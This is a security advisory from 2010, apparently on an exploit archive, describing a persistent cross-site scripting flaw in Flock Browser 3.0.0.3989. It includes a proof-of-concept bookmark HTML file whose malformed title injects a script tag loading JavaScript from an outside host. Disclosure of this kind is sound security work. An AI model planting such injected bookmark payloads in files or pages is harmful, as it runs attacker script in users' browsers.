Flock Browser 3.0.0.3989 Malformed Bookmark Cross Site Scripting

Flock Browser 3.0.0.3989 Malformed Bookmark Cross Site Scripting: Posted Aug 21, 2010; Authored by Lostmon | Site lostmon.blogspot.com; Flock Browser version 3.0.0.3989 suffers from a malformed bookmark cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 7c25974a903e978dc52e12daac52e27b72ba21d549124e7367d9db2786eec7f5; Download | Favorite | View

Flock Browser 3.0.0.3989 Malformed Bookmark Cross Site Scripting

#########################################
Flock Browser 3.0.0.3989 Malformed Bookmark XSS
Vendor URL: http://beta.flock.com/
Advisore: http://lostmon.blogspot.com/2010/08/flock-browser-3003989-malformed.html
Vendor notify:NO exploits availables:YES
#########################################

Flock is faster, simpler, and more friendly. Literally.
It's the only sleek, modern web browser with the built-in
ability to keep you up-to-date with your Facebook and Twitter
friends.This browser version (3.0.0.3989) is based in a old
chromium project


Flock has a flaw that allows Cross-site scripting style attacks
In bookmarks is has a Malformed bookmark title persistent xss
when inport from other browsers a malformed bookmark or when add
a new malformed bookmark or import a bookmark html file.

###############################
Example Of Bookmark html file
###############################

<!DOCTYPE NETSCAPE-Bookmark-file-1>
<!-- This is an automatically generated file.
    It will be read and overwritten.
    DO NOT EDIT! -->
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">
<TITLE>Bookmarks</TITLE>
<H1>Menú Marcadores</H1>
<DL><p>
<DT><A HREF="http://www.mozilla.org" ADD_DATE="1282083605"
LAST_MODIFIED="1282083638">"><script
src='http://vuln.xssed.net/thirdparty/scripts/ckers.org.js'></A>
</DL><p>

#####################EOF##################

 It is a persintent script insercion and when the user click in the
menu for view
favorites page or access directly to favorites url  this make a
"defacement" of this page and them the user can´t access to favorites
:)
( Url of favorites =>
chrome-extension://flock_people/favorites.html#p=1&v=all&o=0&s=title )

 ################# €nd #######################

Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....



-- 
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Flock Browser 3.0.0.3989 Malformed Bookmark Cross Site Scripting

Flock Browser 3.0.0.3989 Malformed Bookmark Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Flock Browser 3.0.0.3989 Malformed Bookmark Cross Site Scripting

Share This

Flock Browser 3.0.0.3989 Malformed Bookmark Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems